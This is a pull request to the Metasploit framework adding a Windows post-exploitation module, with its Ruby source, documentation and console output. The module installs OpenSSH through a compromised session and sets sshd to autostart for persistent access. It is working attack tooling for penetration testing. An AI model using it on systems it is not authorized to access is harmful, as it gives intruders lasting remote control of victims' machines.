### PR TITLE
New post exploitation module: 'Install OpenSSH for Windows'

### DIFF
--- a/documentation/modules/post/windows/manage/install_ssh.md
+++ b/documentation/modules/post/windows/manage/install_ssh.md
@@ -1,0 +1,70 @@
+## Creating A Testing Environment
+
+To use this module you need an administrative Meterpreter or shell session on a Windows 10, 1809 release or higher.
+
+This module has been tested against:
+
+  1. Windows 10, 1903.
+
+This module was not tested against, but may work against:
+
+  1. Windows 10, 1809 and above.
+
+Versions prior to Windows 10 are not supported.
+
+## Module Options
+- **INSTALL_SERVER** - Install OpenSSH.Server for Windows (default: true)
+- **INSTALL_CLIENT** - Install OpenSSH.Client for Windows (default: true)
+- **UNINSTALL_SERVER** - Uninstall OpenSSH.Server for Windows (default: false)
+- **UNINSTALL_CLIENT** - Uninstall OpenSSH.Client for Windows (default: false)
+- **SERVER_VER** - OpenSSH.Server version (default "OpenSSH.Server~~~~0.0.1.0")
+- **CLIENT_VER** - OpenSSH.Client version (default "OpenSSH.Client~~~~0.0.1.0")
+- **AUTOSTART** - Sets sshd service to startup automatically at system boot for persistence (default: true)
+
+### Verification Steps
+
+  1. Start msfconsole
+  2. Obtain a meterpreter or shell session
+  3. Do: `use post/windows/manage/install_ssh`
+  4. Do: `set session #`
+  5. Do: `run`
+  6. Open a new terminal and test SSH access: `ssh user@10.10.10.10`
+
+## Scenarios
+
+### Install OpenSSH on Windows
+
+```
+  msf5 > use post/windows/manage/install_ssh 
+  msf5 post(windows/manage/install_ssh) > set SESSION 1 
+  SESSION => 1
+  msf5 post(windows/manage/install_ssh) > exploit 
+
+  [*] Installing OpenSSH.Server
+  [*] Installing OpenSSH.Client
+  [*] Post module execution completed
+```
+
+Utilities such as ssh, sftp, and sshfs may be used over the Windows SSH session.
+When combined with capabilities such as SSH forwarding, SSH on Windows can provide pentesters excellent utility and flexibility.
+
+### Uninstall OpenSSH on Windows
+
+```
+  msf5 > use post/windows/manage/install_ssh 
+  msf5 post(windows/manage/install_ssh) > set SESSION 1 
+  SESSION => 1
+  msf5 post(windows/manage/install_ssh) > set INSTALL_CLIENT false 
+  INSTALL_CLIENT => false
+  msf5 post(windows/manage/install_ssh) > set INSTALL_SERVER false 
+  INSTALL_SERVER => false
+  msf5 post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true 
+  UNINSTALL_CLIENT => true
+  msf5 post(windows/manage/install_ssh) > set UNINSTALL_SERVER true 
+  UNINSTALL_SERVER => true
+  msf5 post(windows/manage/install_ssh) > exploit 
+
+  [*] Uninstalling OpenSSH.Server
+  [*] Uninstalling OpenSSH.Client
+  [*] Post module execution completed
+```

--- a/modules/post/windows/manage/install_ssh.rb
+++ b/modules/post/windows/manage/install_ssh.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Priv
   include Msf::Post::File
+  include Msf::Post::Windows::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -79,26 +80,22 @@ class MetasploitModule < Msf::Post
     if datastore['AUTOSTART']
       script << "Set-Service -Name sshd -StartupType 'Automatic'"
     end
-    script = "-c \"#{script}\""
-    cmd_exec("powershell.exe", script, 60)
+    psh_exec(script)
   end
 
   def install_ssh_client
     script = "Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; "
-    script = "-c \"#{script}\""
-    cmd_exec("powershell.exe", script, 60)
+    psh_exec(script)
   end
 
   def uninstall_ssh_server
     script = "Stop-Service sshd; "
     script << "Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}"
-    script = " -c \"#{script}\""
-    cmd_exec("powershell.exe", script, 60)
+    psh_exec(script)
   end
 
   def uninstall_ssh_client
     script = "Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}"
-    script = " -c \"#{script}\""
-    cmd_exec("powershell.exe", script, 60)
+    psh_exec(script)
   end
 end

--- a/modules/post/windows/manage/install_ssh.rb
+++ b/modules/post/windows/manage/install_ssh.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Priv
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'          => 'Install OpenSSH for Windows',
+                      'Description'   => '
+                        This module installs OpenSSH server and client for Windows using PowerShell.
+                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.
+                      ',
+                      'License'       => MSF_LICENSE,
+                      'Author'        => ['Michael Long <bluesentinel[at]protonmail.com>'],
+                      'Arch' => [ARCH_X86, ARCH_X64],
+                      'Platform'      => [ 'win' ],
+                      'SessionTypes'  => [ 'meterpreter', 'shell' ],
+                      'References'	=> [
+                        ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
+                        ['URL', 'https://github.com/PowerShell/openssh-portable']
+                      ]))
+    register_options(
+      [
+        OptBool.new('INSTALL_SERVER', [true, 'Install OpenSSH.Server for Windows', true]),
+        OptBool.new('INSTALL_CLIENT', [true, 'Install OpenSSH.Client for Windows', true]),
+        OptBool.new('UNINSTALL_SERVER', [true, 'Uninstall OpenSSH.Server for Windows', false]),
+        OptBool.new('UNINSTALL_CLIENT', [true, 'Uninstall OpenSSH.Client for Windows', false]),
+        OptString.new('SERVER_VER', [true, 'OpenSSH.Server version', "OpenSSH.Server~~~~0.0.1.0"]),
+        OptString.new('CLIENT_VER', [true, 'OpenSSH.Client version', "OpenSSH.Client~~~~0.0.1.0"]),
+        OptBool.new('AUTOSTART', [true, 'Sets sshd service to startup automatically at system boot for persistence', true])
+      ]
+    )
+  end
+
+  def run
+    # check admin privileges
+    unless is_system? || is_admin?
+      fail_with(Failure::NotVulnerable, "Insufficient privileges to install or remove OpenSSH")
+    end
+
+    # check if PowerShell is available
+    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+    if !file? "%WINDIR%\\System32#{psh_path}"
+      fail_with(Failure::NotVulnerable, "No powershell available.")
+    end
+
+    # uninstall OpenSSH.Server
+    if datastore['UNINSTALL_SERVER']
+      print_status("Uninstalling OpenSSH.Server")
+      uninstall_ssh_server
+    end
+
+    # unintall OpenSSH.Client
+    if datastore['UNINSTALL_CLIENT']
+      print_status("Uninstalling OpenSSH.Client")
+      uninstall_ssh_client
+    end
+
+    # install OpenSSH.Server
+    if datastore['INSTALL_SERVER']
+      print_status("Installing OpenSSH.Server")
+      install_ssh_server
+    end
+
+    # install OpenSSH.Client
+    if datastore['INSTALL_CLIENT']
+      print_status("Installing OpenSSH.Client")
+      install_ssh_client
+    end
+  end
+
+  def install_ssh_server
+    script = "Add-WindowsCapability -Online -Name #{datastore['SERVER_VER']}; "
+    script << "Start-Service sshd; "
+    if datastore['AUTOSTART']
+      script << "Set-Service -Name sshd -StartupType 'Automatic'"
+    end
+    script = "-c \"#{script}\""
+    cmd_exec("powershell.exe", script, 60)
+  end
+
+  def install_ssh_client
+    script = "Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; "
+    script = "-c \"#{script}\""
+    cmd_exec("powershell.exe", script, 60)
+  end
+
+  def uninstall_ssh_server
+    script = "Stop-Service sshd; "
+    script << "Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}"
+    script = " -c \"#{script}\""
+    cmd_exec("powershell.exe", script, 60)
+  end
+
+  def uninstall_ssh_client
+    script = "Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}"
+    script = " -c \"#{script}\""
+    cmd_exec("powershell.exe", script, 60)
+  end
+end


### PR DESCRIPTION
This module installs OpenSSH server and client for Windows using PowerShell.
SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Obtain a meterpreter or shell session
- [ ] `use post/windows/manage/install_ssh`
- [ ] `set session <session #>`
- [ ] `run`
- [ ] Open a new terminal and test SSH access: `ssh user@10.10.10.10`

See supporting documentation for additional details:
`metasploit-framework/documentation/modules/post/windows/manage/install_ssh.md`